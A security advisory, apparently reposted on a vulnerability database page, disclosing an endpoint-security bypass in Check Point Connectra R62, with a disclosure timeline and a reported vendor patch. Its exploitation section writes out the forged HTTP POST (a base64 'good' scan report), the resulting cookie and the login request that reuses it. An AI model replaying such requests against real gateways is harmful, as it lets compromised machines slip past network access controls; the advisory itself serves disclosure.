Check Point Connectra End Point security bypass

Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-264

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

I. INTRODUCTION Check Point Connectra is a complete Web Security Gateway that provides SSL VPN access and comprehensive endpoint and integrated intrusion prevention Security in a single unified remote access solution. By combining both SSL VPN connectivity and security in one solution, organizations can effectively deploy SSL VPNs Safely and securely to a diverse set of remote users while ensuring the confidentiality and integrity of information that is critical to the success of any business. For more Information please refer to: II. DESCRIPTION One of the major things in Check Point Connectra is Comprehensive endpoint security. Before a client connects to the internal network a test is being done on the client to check if there is any security hazard on his computer. If a hazard is detected the user is prompted with the hazard details and asked to run the test again before getting the ability to login to the network. A bypass to this test has been detected by Roni Bachar and Nir Goldshlager. A user with a security hazard or a Trojan can bypass the end point security tests and login to the network with a security hazard on his computer. The bypass is being done by sending a "good" report to the /sre/params.php page after sending the report a set cookie will be send from the server to the client. This cookie can be used to bypass the endpoint security findings. The bypass was detected on the latest version of checkpoint connectra R62. III. EXPLOITATION The vulnerability can be exploited by doing the following stages: Sending a post request as followed: POST https://serverip/sre/params.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: ICS_Secure Host: serverip Content-Length: 251 Cache-Control: no-cache Cookie: ICS_Test_Cookie=1 Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzL jcuM TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ 2F0Y WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvP go8L 1NyZVNjYW5SZXBvcnQ+Cg== After sending the request a Set-Cookie will be received from the Check Point Connectra server HTTP/1.1 200 OK Date: Fri, 15 Dec 2006 17:16:19 GMT Server: CPWS Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT Pragma: no-cache Cache-Control: no-cache Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13 Sep 2016 17:16:19 GMT; path=/; secure Content-Length: 0 Content-Type: text/html This ICSCookie is needed to be enteredd into the next request GET https://serverip/Login/Login?LangCode= HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/, application/, application/msword, */* Accept-Language: en-us UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Host: serverip Connection: Keep-Alive Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d IV. WORKAROUND Check point released a patch for this vulnerability. V. DISCLOSURE TIMELINE 20.12.06 First Identification of the flaw 24.12.06 Reporting the flaw to checkpoint 27.12.06 Meeting checkpoint security stuff 22.01.07 Publishing the vulnerability. 22.01.07 Checkpoint Released a patch for the vulnerability VI. CREDITS The vulnerability was discovered by Roni Bachar and Nir Goldshlager.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top